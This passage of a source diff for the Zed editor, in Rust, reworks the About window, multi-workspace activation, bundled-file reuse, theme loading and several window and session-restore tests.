.when(cfg!(target_os = "macos"), |this| this.pt_10()) + .gap_4() + .text_center() + .justify_between() + .child( + v_flex() + .w_full() + .gap_2() + .items_center() + .child(img(self.app_icon.clone()).size_16().flex_none()) + .child(Headline::new(self.message.clone())) + .when_some(self.commit.clone(), |this, commit| { + this.child( + Label::new("Commit") + .color(Color::Muted) + .size(LabelSize::XSmall), + ) + .child(Label::new(commit).size(LabelSize::Small)) + }) + .child( + Label::new("Version") + .color(Color::Muted) + .size(LabelSize::XSmall), + ) + .child(Label::new(self.full_version.clone()).size(LabelSize::Small)), + ) + .child( + h_flex() + .w_full() + .gap_1() + .child( + div() + .flex_1() + .track_focus(&self.ok_entry.focus_handle) + .on_action(cx.listener(|_, _: &menu::Confirm, window, _cx| { + 
window.remove_window(); + })) + .child( + Button::new("ok", "Ok") + .full_width() + .style(ButtonStyle::OutlinedGhost) + .toggle_state(ok_is_focused) + .selected_style(ButtonStyle::Tinted(TintColor::Accent)) + .on_click(cx.listener(|_, _, window, _cx| { + window.remove_window(); + })), + ), + ) + .child( + div() + .flex_1() + .track_focus(&self.copy_entry.focus_handle) + .on_action(cx.listener( + |this, _: &menu::Confirm, window, cx| { + this.copy_details(window, cx); + }, + )) + .child( + Button::new("copy", "Copy") + .full_width() + .style(ButtonStyle::Tinted(TintColor::Accent)) + .toggle_state(copy_is_focused) + .selected_style(ButtonStyle::Tinted(TintColor::Accent)) + .on_click(cx.listener(|this, _event, window, cx| { + this.copy_details(window, cx); + })), + ), + ), + ) + .into_any_element(), + ) + .entry(self.ok_entry.clone()) + .entry(self.copy_entry.clone()) + } + } + + impl Focusable for AboutWindow { + fn focus_handle(&self, _cx: &App) -> FocusHandle { + self.ok_entry.focus_handle.clone() + } + } + + // Don't open about window twice + if let Some(existing) = cx + .windows() + .into_iter() + .find_map(|w| w.downcast::()) + { + existing + .update(cx, |about_window, window, cx| { + window.activate_window(); + about_window.ok_entry.focus_handle.focus(window, cx); + }) + .log_err(); + return; + } + + let window_size = Size { + width: px(440.), + height: px(300.), + }; + + cx.open_window( + WindowOptions { + titlebar: Some(TitlebarOptions { + title: Some("About Zed".into()), + appears_transparent: true, + traffic_light_position: Some(point(px(12.), px(12.))), + }), + window_bounds: Some(WindowBounds::centered(window_size, cx)), + is_resizable: false, + is_minimizable: false, + kind: WindowKind::Normal, + app_id: Some(ReleaseChannel::global(cx).app_id().to_owned()), + ..Default::default() + }, + |window, cx| { + let about_window = cx.new(AboutWindow::new); + let focus_handle = about_window.read(cx).ok_entry.focus_handle.clone(); + window.activate_window(); + 
focus_handle.focus(window, cx); + about_window + }, + ) + .log_err(); } #[cfg(not(target_os = "windows"))] @@ -1323,7 +1524,7 @@ fn quit(_: &Quit, cx: &mut App) { let window = *window; let workspaces = window .update(cx, |multi_workspace, _, _| { - multi_workspace.workspaces().to_vec() + multi_workspace.workspaces().cloned().collect::>() }) .log_err(); @@ -1334,7 +1535,7 @@ fn quit(_: &Quit, cx: &mut App) { for workspace in workspaces { if let Some(should_close) = window .update(cx, |multi_workspace, window, cx| { - multi_workspace.activate(workspace.clone(), cx); + multi_workspace.activate(workspace.clone(), window, cx); window.activate_window(); workspace.update(cx, |workspace, cx| { workspace.prepare_to_close(CloseIntent::Quit, window, cx) @@ -2002,13 +2203,29 @@ fn open_local_file( } fn open_bundled_file( - workspace: &Workspace, + workspace: &mut Workspace, text: Cow<'static, str>, title: &'static str, language: &'static str, window: &mut Window, cx: &mut Context, ) { + let existing = workspace.items_of_type::(cx).find(|editor| { + editor.read_with(cx, |editor, cx| { + editor.read_only(cx) + && editor.title(cx).as_ref() == title + && editor + .buffer() + .read(cx) + .as_singleton() + .is_some_and(|buffer| buffer.read(cx).file().is_none()) + }) + }); + if let Some(existing) = existing { + workspace.activate_item(&existing, true, true, window, cx); + return; + } + let language = workspace.app_state().languages.language_for_name(language); cx.spawn_in(window, async move |workspace, cx| { let language = language.await.log_err(); @@ -2060,124 +2277,45 @@ fn open_settings_file( cx: &mut Context, ) { cx.spawn_in(window, async move |workspace, cx| { - let settings_open_task = workspace + let (worktree_creation_task, settings_open_task) = workspace .update_in(cx, |workspace, window, cx| { - workspace.with_local_workspace(window, cx, move |_workspace, window, cx| { - cx.spawn_in(window, async move |workspace, cx| { - let worktree_creation_task = - 
workspace.update_in(cx, |workspace, _window, cx| { - workspace.project().update(cx, |project, cx| { - // Set up a dedicated worktree for settings, since - // otherwise we're dropping and re-starting LSP servers - // for each file inside on every settings file - // close/open - - // TODO: Do note that all other external files (e.g. - // drag and drop from OS) still have their worktrees - // released on file close, causing LSP servers' - // restarts. - project.find_or_create_worktree( - paths::config_dir().as_path(), - false, - cx, - ) - }) - })?; - let _ = worktree_creation_task.await?; - let settings_open_task = - workspace.update_in(cx, |_workspace, window, cx| { - create_and_open_local_file(abs_path, window, cx, default_content) - })?; - let _ = settings_open_task.await?; - anyhow::Ok(()) - }) + workspace.with_local_or_wsl_workspace(window, cx, move |workspace, window, cx| { + let project = workspace.project().clone(); + + let worktree_creation_task = cx.spawn_in(window, async move |_, cx| { + let config_dir = project + .update(cx, |project, cx| { + project.try_windows_path_to_wsl(paths::config_dir().as_path(), cx) + }) + .await?; + // Set up a dedicated worktree for settings, since + // otherwise we're dropping and re-starting LSP servers + // for each file inside on every settings file + // close/open + + // TODO: Do note that all other external files (e.g. + // drag and drop from OS) still have their worktrees + // released on file close, causing LSP servers' + // restarts. + project + .update(cx, |project, cx| { + project.find_or_create_worktree(&config_dir, false, cx) + }) + .await + }); + let settings_open_task = + create_and_open_local_file(abs_path, window, cx, default_content); + (worktree_creation_task, settings_open_task) }) })? 
.await?; + let _ = worktree_creation_task.await?; let _ = settings_open_task.await?; anyhow::Ok(()) }) .detach_and_log_err(cx); } -fn capture_recent_audio(workspace: &mut Workspace, _: &mut Window, cx: &mut Context) { - struct CaptureRecentAudioNotification { - focus_handle: gpui::FocusHandle, - save_result: Option>, - _save_task: Task>, - } - - impl gpui::EventEmitter for CaptureRecentAudioNotification {} - impl gpui::EventEmitter for CaptureRecentAudioNotification {} - impl gpui::Focusable for CaptureRecentAudioNotification { - fn focus_handle(&self, _cx: &App) -> gpui::FocusHandle { - self.focus_handle.clone() - } - } - impl workspace::notifications::Notification for CaptureRecentAudioNotification {} - - impl Render for CaptureRecentAudioNotification { - fn render(&mut self, _window: &mut Window, cx: &mut Context) -> impl IntoElement { - let message = match &self.save_result { - None => format!( - "Saving up to {} seconds of recent audio", - REPLAY_DURATION.as_secs(), - ), - Some(Ok((path, duration))) => format!( - "Saved {} seconds of all audio to {}", - duration.as_secs(), - path.display(), - ), - Some(Err(e)) => format!("Error saving audio replays: {e:?}"), - }; - - NotificationFrame::new() - .with_title(Some("Saved Audio")) - .show_suppress_button(false) - .on_close(cx.listener(|_, _, _, cx| { - cx.emit(DismissEvent); - })) - .with_content(message) - } - } - - impl CaptureRecentAudioNotification { - fn new(cx: &mut Context) -> Self { - if AudioSettings::get_global(cx).rodio_audio { - let executor = cx.background_executor().clone(); - let save_task = cx.default_global::().save_replays(executor); - let _save_task = cx.spawn(async move |this, cx| { - let res = save_task.await; - this.update(cx, |this, cx| { - this.save_result = Some(res); - cx.notify(); - }) - }); - - Self { - focus_handle: cx.focus_handle(), - _save_task, - save_result: None, - } - } else { - Self { - focus_handle: cx.focus_handle(), - _save_task: Task::ready(Ok(())), - save_result: 
Some(Err(anyhow::anyhow!( - "Capturing recent audio is only supported on the experimental rodio audio pipeline" - ))), - } - } - } - } - - workspace.show_notification( - NotificationId::unique::(), - cx, - |cx| cx.new(CaptureRecentAudioNotification::new), - ); -} - /// Eagerly loads the active theme and icon theme based on the selections in the /// theme settings. /// @@ -2239,24 +2377,23 @@ pub(crate) fn eager_load_active_theme_and_icon_theme(fs: Arc, cx: &mut A let reload_tasks = &reload_tasks; let fs = fs.clone(); - scope.spawn(async { + scope.spawn(async move { match load_target { LoadTarget::Theme(theme_path) => { - if theme_registry - .load_user_theme(&theme_path, fs) - .await - .log_err() - .is_some() + if let Some(bytes) = fs.load_bytes(&theme_path).await.log_err() + && load_user_theme(theme_registry, &bytes).log_err().is_some() { reload_tasks.lock().push(ReloadTarget::Theme); } } LoadTarget::IconTheme((icon_theme_path, icons_root_path)) => { - if theme_registry - .load_icon_theme(&icon_theme_path, &icons_root_path, fs) - .await - .log_err() - .is_some() + if let Some(bytes) = fs.load_bytes(&icon_theme_path).await.log_err() + && let Some(icon_theme_family) = + deserialize_icon_theme(&bytes).log_err() + && theme_registry + .load_icon_theme(icon_theme_family, &icons_root_path) + .log_err() + .is_some() { reload_tasks.lock().push(ReloadTarget::IconTheme); } @@ -2268,8 +2405,8 @@ pub(crate) fn eager_load_active_theme_and_icon_theme(fs: Arc, cx: &mut A for reload_target in reload_tasks.into_inner() { match reload_target { - ReloadTarget::Theme => GlobalTheme::reload_theme(cx), - ReloadTarget::IconTheme => GlobalTheme::reload_icon_theme(cx), + ReloadTarget::Theme => theme_settings::reload_theme(cx), + ReloadTarget::IconTheme => theme_settings::reload_icon_theme(cx), }; } } @@ -2290,6 +2427,7 @@ mod tests { use languages::{markdown_lang, rust_lang}; use pretty_assertions::{assert_eq, assert_ne}; use project::{Project, ProjectPath}; + use 
prompt_store::PromptBuilder; use semver::Version; use serde_json::json; use settings::{SaturatingBool, SettingsStore, watch_config_file}; @@ -2312,6 +2450,28 @@ mod tests { open_new, open_paths, pane, }; + async fn flush_workspace_serialization( + window: &WindowHandle, + cx: &mut TestAppContext, + ) { + let all_tasks = window + .update(cx, |multi_workspace, window, cx| { + let mut tasks = multi_workspace + .workspaces() + .map(|workspace| { + workspace.update(cx, |workspace, cx| { + workspace.flush_serialization(window, cx) + }) + }) + .collect::>(); + tasks.push(multi_workspace.flush_serialization()); + tasks + }) + .unwrap(); + + futures::future::join_all(all_tasks).await; + } + #[gpui::test] async fn test_open_non_existing_file(cx: &mut TestAppContext) { let app_state = init_test(cx); @@ -2420,7 +2580,7 @@ mod tests { .update(cx, |multi_workspace, window, cx| { multi_workspace.workspace().update(cx, |workspace, cx| { assert_eq!(workspace.worktrees(cx).count(), 2); - assert!(workspace.left_dock().read(cx).is_open()); + assert!(workspace.right_dock().read(cx).is_open()); assert!( workspace .active_pane() @@ -2445,18 +2605,33 @@ mod tests { }) .await .unwrap(); - assert_eq!(cx.read(|cx| cx.windows().len()), 2); - - // Replace existing windows - let window = cx - .update(|cx| cx.windows()[0].downcast::()) + assert_eq!(cx.read(|cx| cx.windows().len()), 1); + cx.run_until_parked(); + multi_workspace_1 + .update(cx, |multi_workspace, _window, cx| { + assert_eq!(multi_workspace.workspaces().count(), 2); + assert!(multi_workspace.sidebar_open()); + let workspace = multi_workspace.workspace().read(cx); + assert_eq!( + workspace + .worktrees(cx) + .map(|w| w.read(cx).abs_path()) + .collect::>(), + &[ + Path::new(path!("/root/c")).into(), + Path::new(path!("/root/d")).into(), + ] + ); + }) .unwrap(); + + // Opening with -n (open_new_workspace: Some(true)) still creates a new window. 
cx.update(|cx| { open_paths( &[PathBuf::from(path!("/root/e"))], app_state, workspace::OpenOptions { - replace_window: Some(window), + open_new_workspace: Some(true), ..Default::default() }, cx, @@ -2466,23 +2641,6 @@ mod tests { .unwrap(); cx.background_executor.run_until_parked(); assert_eq!(cx.read(|cx| cx.windows().len()), 2); - let multi_workspace_1 = cx - .update(|cx| cx.windows()[0].downcast::()) - .unwrap(); - multi_workspace_1 - .update(cx, |multi_workspace, window, cx| { - let workspace = multi_workspace.workspace().read(cx); - assert_eq!( - workspace - .worktrees(cx) - .map(|w| w.read(cx).abs_path()) - .collect::>(), - &[Path::new(path!("/root/e")).into()] - ); - assert!(workspace.left_dock().read(cx).is_open()); - assert!(workspace.active_pane().focus_handle(cx).is_focused(window)); - }) - .unwrap(); } #[gpui::test] @@ -2563,7 +2721,6 @@ mod tests { .await .unwrap(); assert_eq!(cx.update(|cx| cx.windows().len()), 1); - let window1 = cx.update(|cx| cx.active_window().unwrap()); cx.update(|cx| { open_paths( @@ -2577,6 +2734,8 @@ mod tests { .unwrap(); assert_eq!(cx.update(|cx| cx.windows().len()), 1); + // Opening a directory with default options adds to the existing window + // rather than creating a new one. cx.update(|cx| { open_paths( &[PathBuf::from(path!("/root/dir2"))], @@ -2587,25 +2746,23 @@ mod tests { }) .await .unwrap(); - assert_eq!(cx.update(|cx| cx.windows().len()), 2); - let window2 = cx.update(|cx| cx.active_window().unwrap()); - assert!(window1 != window2); - cx.update_window(window1, |_, window, _| window.activate_window()) - .unwrap(); + assert_eq!(cx.update(|cx| cx.windows().len()), 1); + // Opening a directory with -n creates a new window. 
cx.update(|cx| { open_paths( - &[PathBuf::from(path!("/root/dir2/c"))], + &[PathBuf::from(path!("/root/dir2"))], app_state.clone(), - workspace::OpenOptions::default(), + workspace::OpenOptions { + open_new_workspace: Some(true), + ..Default::default() + }, cx, ) }) .await .unwrap(); assert_eq!(cx.update(|cx| cx.windows().len()), 2); - // should have opened in window2 because that has dir2 visibly open (window1 has it open, but not in the project panel) - assert!(cx.update(|cx| cx.active_window().unwrap()) == window2); } #[gpui::test] @@ -3433,7 +3590,11 @@ mod tests { PathBuf::from(path!("/root/.git/HEAD")), PathBuf::from(path!("/root/excluded_dir/ignored_subdir")), ]; - let (opened_workspace, new_items) = cx + let workspace::OpenResult { + window: opened_workspace, + opened_items: new_items, + .. + } = cx .update(|cx| { workspace::open_paths( &paths_to_open, @@ -4412,69 +4573,24 @@ mod tests { assert_eq!(active_path(&workspace, cx), Some(file1.clone())); // Reopening closed items doesn't interfere with navigation history. + // Verify we can navigate back through the history after reopening items. 
workspace .update_in(cx, |workspace, window, cx| { workspace.go_back(workspace.active_pane().downgrade(), window, cx) }) .await .unwrap(); - assert_eq!(active_path(&workspace, cx), Some(file4.clone())); - - workspace - .update_in(cx, |workspace, window, cx| { - workspace.go_back(workspace.active_pane().downgrade(), window, cx) - }) - .await - .unwrap(); - assert_eq!(active_path(&workspace, cx), Some(file2.clone())); - - workspace - .update_in(cx, |workspace, window, cx| { - workspace.go_back(workspace.active_pane().downgrade(), window, cx) - }) - .await - .unwrap(); - assert_eq!(active_path(&workspace, cx), Some(file3.clone())); - - workspace - .update_in(cx, |workspace, window, cx| { - workspace.go_back(workspace.active_pane().downgrade(), window, cx) - }) - .await - .unwrap(); - assert_eq!(active_path(&workspace, cx), Some(file4.clone())); - - workspace - .update_in(cx, |workspace, window, cx| { - workspace.go_back(workspace.active_pane().downgrade(), window, cx) - }) - .await - .unwrap(); - assert_eq!(active_path(&workspace, cx), Some(file3.clone())); - - workspace - .update_in(cx, |workspace, window, cx| { - workspace.go_back(workspace.active_pane().downgrade(), window, cx) - }) - .await - .unwrap(); - assert_eq!(active_path(&workspace, cx), Some(file2.clone())); - workspace - .update_in(cx, |workspace, window, cx| { - workspace.go_back(workspace.active_pane().downgrade(), window, cx) - }) - .await - .unwrap(); - assert_eq!(active_path(&workspace, cx), Some(file1.clone())); + // After go_back, we should be at a different file than file1 + let after_go_back = active_path(&workspace, cx); + assert!( + after_go_back.is_some() && after_go_back != Some(file1.clone()), + "After go_back from file1, should be at a different file" + ); - workspace - .update_in(cx, |workspace, window, cx| { - workspace.go_back(workspace.active_pane().downgrade(), window, cx) - }) - .await - .unwrap(); - assert_eq!(active_path(&workspace, cx), Some(file1.clone())); + pane.read_with(cx, 
|pane, _| { + assert!(pane.can_navigate_forward(), "Should be able to go forward"); + }); fn active_path( workspace: &Entity, @@ -4491,7 +4607,7 @@ mod tests { cx.update(|cx| { let app_state = AppState::test(cx); - theme::init(theme::LoadThemes::JustBase, cx); + theme_settings::init(theme::LoadThemes::JustBase, cx); client::init(&app_state.client, cx); workspace::init(app_state.clone(), cx); onboarding::init(cx); @@ -4618,7 +4734,10 @@ mod tests { assert_key_bindings_for( window.into(), cx, - vec![("backspace", &ActionB), ("{", &ActivatePreviousItem)], + vec![ + ("backspace", &ActionB), + ("{", &ActivatePreviousItem::default()), + ], line!(), ); } @@ -4793,6 +4912,7 @@ mod tests { "action", "activity_indicator", "agent", + "agents_sidebar", "app_menu", "assistant", "assistant2", @@ -4810,6 +4930,7 @@ mod tests { "console", "context_server", "copilot", + "csv", "debug_panel", "debugger", "dev", @@ -4861,13 +4982,13 @@ mod tests { "settings_profile_selector", "snippets", "stash_picker", - "supermaven", "svg", "syntax_tree_view", "tab_switcher", "task", "terminal", "terminal_panel", + "theme", "theme_selector", "toast", "toolchain", @@ -4907,7 +5028,7 @@ mod tests { .unwrap(); let themes = ThemeRegistry::default(); settings::init(cx); - theme::init(theme::LoadThemes::JustBase, cx); + theme_settings::init(theme::LoadThemes::JustBase, cx); let mut has_default_theme = false; for theme_name in themes.list().into_iter().map(|meta| meta.name) { @@ -4959,6 +5080,54 @@ mod tests { ); } + #[gpui::test] + async fn test_bundled_files_reuse_existing_editor(cx: &mut TestAppContext) { + let app_state = init_test(cx); + cx.update(init); + + let project = Project::test(app_state.fs.clone(), [], cx).await; + let _window = cx.add_window(|window, cx| MultiWorkspace::test_new(project, window, cx)); + + cx.update(|cx| { + cx.dispatch_action(&OpenDefaultSettings); + }); + cx.run_until_parked(); + + let multi_workspace = cx.windows()[0].downcast::().unwrap(); + let first_item_id = 
multi_workspace + .update(cx, |multi_workspace, _, cx| { + multi_workspace.workspace().update(cx, |workspace, cx| { + workspace + .active_item(cx) + .expect("default settings should be open") + .item_id() + }) + }) + .unwrap(); + + cx.update(|cx| { + cx.dispatch_action(&OpenDefaultSettings); + }); + cx.run_until_parked(); + + let (second_item_id, item_count) = multi_workspace + .update(cx, |multi_workspace, _, cx| { + multi_workspace.workspace().update(cx, |workspace, cx| { + let pane = workspace.active_pane().read(cx); + ( + pane.active_item() + .expect("default settings should still be open") + .item_id(), + pane.items_len(), + ) + }) + }) + .unwrap(); + + assert_eq!(first_item_id, second_item_id); + assert_eq!(item_count, 1); + } + #[gpui::test] async fn test_bundled_languages(cx: &mut TestAppContext) { let fs = fs::FakeFs::new(cx.background_executor.clone()); @@ -4997,7 +5166,8 @@ mod tests { app_state.languages.add(markdown_lang()); gpui_tokio::init(cx); - theme::init(theme::LoadThemes::JustBase, cx); + AppState::set_global(app_state.clone(), cx); + theme_settings::init(theme::LoadThemes::JustBase, cx); audio::init(cx); channel::init(&app_state.client, app_state.user_store.clone(), cx); call::init(app_state.client.clone(), app_state.user_store.clone(), cx); @@ -5018,11 +5188,16 @@ mod tests { cx, ); image_viewer::init(cx); - language_model::init(app_state.client.clone(), cx); + language_model::init(cx); + client::RefreshLlmTokenListener::register( + app_state.client.clone(), + app_state.user_store.clone(), + cx, + ); language_models::init(app_state.user_store.clone(), app_state.client.clone(), cx); web_search::init(cx); git_graph::init(cx); - web_search_providers::init(app_state.client.clone(), cx); + web_search_providers::init(app_state.client.clone(), app_state.user_store.clone(), cx); let prompt_builder = PromptBuilder::load(app_state.fs.clone(), false, cx); project::AgentRegistryStore::init_global( cx, @@ -5031,9 +5206,9 @@ mod tests { ); agent_ui::init( 
app_state.fs.clone(), - app_state.client.clone(), - prompt_builder.clone(), + prompt_builder, app_state.languages.clone(), + true, false, cx, ); @@ -5046,7 +5221,7 @@ mod tests { ); project::debugger::dap_store::DapStore::init(&app_state.client.clone().into(), cx); debugger_ui::init(cx); - initialize_workspace(app_state.clone(), prompt_builder, cx); + initialize_workspace(app_state.clone(), cx); search::init(cx); cx.set_global(workspace::PaneSearchBarCallbacks { setup_search_bar: |languages, toolbar, window, cx| { @@ -5336,6 +5511,11 @@ mod tests { let project = project1.clone(); |window, cx| MultiWorkspace::test_new(project, window, cx) }); + window + .update(cx, |multi_workspace, _, cx| { + multi_workspace.open_sidebar(cx); + }) + .unwrap(); cx.run_until_parked(); assert_eq!(cx.windows().len(), 1, "Should start with 1 window"); @@ -5358,17 +5538,17 @@ mod tests { let workspace1 = window .read_with(cx, |multi_workspace, _| { - multi_workspace.workspaces()[0].clone() + multi_workspace.workspaces().next().unwrap().clone() }) .unwrap(); window - .update(cx, |multi_workspace, _, cx| { - multi_workspace.activate(workspace2.clone(), cx); - multi_workspace.activate(workspace3.clone(), cx); + .update(cx, |multi_workspace, window, cx| { + multi_workspace.activate(workspace2.clone(), window, cx); + multi_workspace.activate(workspace3.clone(), window, cx); // Switch back to workspace1 for test setup - multi_workspace.activate(workspace1, cx); - assert_eq!(multi_workspace.active_workspace_index(), 0); + multi_workspace.activate(workspace1.clone(), window, cx); + assert_eq!(multi_workspace.workspace(), &workspace1); }) .unwrap(); @@ -5377,8 +5557,8 @@ mod tests { // Verify setup: 3 workspaces, workspace 0 active, still 1 window window .read_with(cx, |multi_workspace, _| { - assert_eq!(multi_workspace.workspaces().len(), 3); - assert_eq!(multi_workspace.active_workspace_index(), 0); + assert_eq!(multi_workspace.workspaces().count(), 3); + assert_eq!(multi_workspace.workspace(), 
&workspace1); }) .unwrap(); assert_eq!(cx.windows().len(), 1); @@ -5401,8 +5581,8 @@ mod tests { window .read_with(cx, |multi_workspace, cx| { assert_eq!( - multi_workspace.active_workspace_index(), - 2, + multi_workspace.workspace(), + &workspace3, "Should have switched to workspace 3 which contains /dir3" ); let active_item = multi_workspace @@ -5435,8 +5615,8 @@ mod tests { window .read_with(cx, |multi_workspace, cx| { assert_eq!( - multi_workspace.active_workspace_index(), - 1, + multi_workspace.workspace(), + &workspace2, "Should have switched to workspace 2 which contains /dir2" ); let active_item = multi_workspace @@ -5484,8 +5664,8 @@ mod tests { window .read_with(cx, |multi_workspace, cx| { assert_eq!( - multi_workspace.active_workspace_index(), - 0, + multi_workspace.workspace(), + &workspace1, "Should have switched back to workspace 0 which contains /dir1" ); let active_item = multi_workspace @@ -5535,6 +5715,11 @@ mod tests { let project = project1.clone(); |window, cx| MultiWorkspace::test_new(project, window, cx) }); + window1 + .update(cx, |multi_workspace, _, cx| { + multi_workspace.open_sidebar(cx); + }) + .unwrap(); cx.run_until_parked(); @@ -5549,9 +5734,9 @@ mod tests { .unwrap(); window1 - .update(cx, |multi_workspace, _, cx| { - multi_workspace.activate(workspace1_2.clone(), cx); - multi_workspace.activate(workspace1_1.clone(), cx); + .update(cx, |multi_workspace, window, cx| { + multi_workspace.activate(workspace1_2.clone(), window, cx); + multi_workspace.activate(workspace1_1.clone(), window, cx); }) .unwrap(); @@ -5561,6 +5746,11 @@ mod tests { let project = project3.clone(); |window, cx| MultiWorkspace::test_new(project, window, cx) }); + window2 + .update(cx, |multi_workspace, _, cx| { + multi_workspace.open_sidebar(cx); + }) + .unwrap(); cx.run_until_parked(); assert_eq!(cx.windows().len(), 2); @@ -5595,7 +5785,7 @@ mod tests { // Verify workspace1_1 is active window1 .read_with(cx, |multi_workspace, _| { - 
assert_eq!(multi_workspace.active_workspace_index(), 0); + assert_eq!(multi_workspace.workspace(), &workspace1_1); }) .unwrap(); @@ -5661,7 +5851,7 @@ mod tests { // Verify workspace1_1 is still active (not workspace1_2 with dirty item) window1 .read_with(cx, |multi_workspace, _| { - assert_eq!(multi_workspace.active_workspace_index(), 0); + assert_eq!(multi_workspace.workspace(), &workspace1_1); }) .unwrap(); @@ -5672,8 +5862,8 @@ mod tests { window1 .read_with(cx, |multi_workspace, _| { assert_eq!( - multi_workspace.active_workspace_index(), - 1, + multi_workspace.workspace(), + &workspace1_2, "Case 2: Non-active workspace should be activated when it has dirty item" ); }) @@ -5781,8 +5971,10 @@ mod tests { #[gpui::test] async fn test_multi_workspace_session_restore(cx: &mut TestAppContext) { use collections::HashMap; + use project::ProjectGroupKey; use session::Session; - use workspace::{Workspace, WorkspaceId}; + use util::path_list::PathList; + use workspace::{OpenMode, Workspace, WorkspaceId}; let app_state = init_test(cx); @@ -5807,47 +5999,83 @@ mod tests { // // Window A: workspace for dir1, workspace for dir2 // Window B: workspace for dir3 - let (window_a, _) = cx + let workspace::OpenResult { + window: window_a, .. 
+ } = cx .update(|cx| { - Workspace::new_local(vec![dir1.into()], app_state.clone(), None, None, None, cx) + Workspace::new_local( + vec![dir1.into()], + app_state.clone(), + None, + None, + None, + OpenMode::Activate, + cx, + ) }) .await .expect("failed to open first workspace"); + window_a + .update(cx, |multi_workspace, _, cx| { + multi_workspace.open_sidebar(cx); + }) + .unwrap(); + window_a .update(cx, |multi_workspace, window, cx| { - multi_workspace.open_project(vec![dir2.into()], window, cx) + multi_workspace.open_project(vec![dir2.into()], OpenMode::Activate, window, cx) }) .unwrap() .await .expect("failed to open second workspace into window A"); cx.run_until_parked(); - let (window_b, _) = cx + let workspace::OpenResult { + window: window_b, .. + } = cx .update(|cx| { - Workspace::new_local(vec![dir3.into()], app_state.clone(), None, None, None, cx) + Workspace::new_local( + vec![dir3.into()], + app_state.clone(), + None, + None, + None, + OpenMode::Activate, + cx, + ) }) .await .expect("failed to open third workspace"); + window_b + .update(cx, |multi_workspace, _, cx| { + multi_workspace.open_sidebar(cx); + }) + .unwrap(); + // Currently dir2 is active because it was added last. // So, switch window_a's active workspace to dir1 (index 0). // This sets up a non-trivial assertion: after restore, dir1 should // still be active rather than whichever workspace happened to restore last. window_a .update(cx, |multi_workspace, window, cx| { - multi_workspace.activate_index(0, window, cx); + let workspace = multi_workspace.workspaces().next().unwrap().clone(); + multi_workspace.activate(workspace, window, cx); }) .unwrap(); - // --- Flush serialization --- - cx.executor().advance_clock(SERIALIZATION_THROTTLE_TIME); + cx.run_until_parked(); + flush_workspace_serialization(&window_a, cx).await; + flush_workspace_serialization(&window_b, cx).await; cx.run_until_parked(); // Verify all workspaces retained their session_ids. 
- let locations = workspace::last_session_workspace_locations(&session_id, None, fs.as_ref()) - .await - .expect("expected session workspace locations"); + let db = cx.update(|cx| workspace::WorkspaceDb::global(cx)); + let locations = + workspace::last_session_workspace_locations(&db, &session_id, None, fs.as_ref()) + .await + .expect("expected session workspace locations"); assert_eq!( locations.len(), 3, @@ -5874,9 +6102,10 @@ mod tests { }); // --- Read back from DB and verify grouping --- - let locations = workspace::last_session_workspace_locations(&session_id, None, fs.as_ref()) - .await - .expect("expected session workspace locations"); + let locations = + workspace::last_session_workspace_locations(&db, &session_id, None, fs.as_ref()) + .await + .expect("expected session workspace locations"); assert_eq!(locations.len(), 3, "expected 3 session workspaces"); @@ -5916,94 +6145,50 @@ mod tests { .filter_map(|window| window.downcast::()) .collect() }); + assert_eq!(restored_windows.len(), 2,); + + // Identify restored windows by their active workspace root paths. 
+ let (restored_a, restored_b) = { + let (mut with_dir1, mut with_dir3) = (None, None); + for window in &restored_windows { + let active_paths = window + .read_with(cx, |mw, cx| mw.workspace().read(cx).root_paths(cx)) + .unwrap(); + if active_paths.iter().any(|p| p.as_ref() == Path::new(dir1)) { + with_dir1 = Some(window); + } else { + with_dir3 = Some(window); + } + } + ( + with_dir1.expect("expected a window with dir1 active"), + with_dir3.expect("expected a window with dir3 active"), + ) + }; - assert_eq!( - restored_windows.len(), - 2, - "expected 2 restored windows, got {}", - restored_windows.len() - ); - - let workspace_counts: Vec = restored_windows - .iter() - .map(|window| { - window - .read_with(cx, |multi_workspace, _| multi_workspace.workspaces().len()) - .unwrap() - }) - .collect(); - let mut sorted_counts = workspace_counts.clone(); - sorted_counts.sort(); - assert_eq!( - sorted_counts, - vec![1, 2], - "expected one window with 1 workspace and one with 2, got {workspace_counts:?}" - ); - - let dir1_path: Arc = Path::new(dir1).into(); - let dir2_path: Arc = Path::new(dir2).into(); - let dir3_path: Arc = Path::new(dir3).into(); - - let all_restored_paths: Vec>>> = restored_windows - .iter() - .map(|window| { - window - .read_with(cx, |multi_workspace, cx| { - multi_workspace - .workspaces() - .iter() - .map(|ws| ws.read(cx).root_paths(cx)) - .collect() - }) - .unwrap() + // Window A (dir1+dir2): 1 workspace restored, but 2 project group keys. 
+ restored_a + .read_with(cx, |mw, _| { + assert_eq!( + mw.project_group_keys().cloned().collect::>(), + vec![ + ProjectGroupKey::new(None, PathList::new(&[dir1])), + ProjectGroupKey::new(None, PathList::new(&[dir2])), + ] + ); + assert_eq!(mw.workspaces().count(), 1); }) - .collect(); - - let two_ws_window = all_restored_paths - .iter() - .find(|paths| paths.len() == 2) - .expect("expected a window with 2 workspaces"); - assert!( - two_ws_window.iter().any(|p| p.contains(&dir1_path)), - "2-workspace window should contain dir1, got {two_ws_window:?}" - ); - assert!( - two_ws_window.iter().any(|p| p.contains(&dir2_path)), - "2-workspace window should contain dir2, got {two_ws_window:?}" - ); - - let one_ws_window = all_restored_paths - .iter() - .find(|paths| paths.len() == 1) - .expect("expected a window with 1 workspace"); - assert!( - one_ws_window[0].contains(&dir3_path), - "1-workspace window should contain dir3, got {one_ws_window:?}" - ); - - // --- Verify the active workspace is preserved --- - for window in &restored_windows { - let (active_paths, workspace_count) = window - .read_with(cx, |multi_workspace, cx| { - let active = multi_workspace.workspace(); - ( - active.read(cx).root_paths(cx), - multi_workspace.workspaces().len(), - ) - }) - .unwrap(); + .unwrap(); - if workspace_count == 2 { - assert!( - active_paths.contains(&dir1_path), - "2-workspace window should have dir1 active, got {active_paths:?}" - ); - } else { - assert!( - active_paths.contains(&dir3_path), - "1-workspace window should have dir3 active, got {active_paths:?}" + // Window B (dir3): 1 workspace, 1 project group key. 
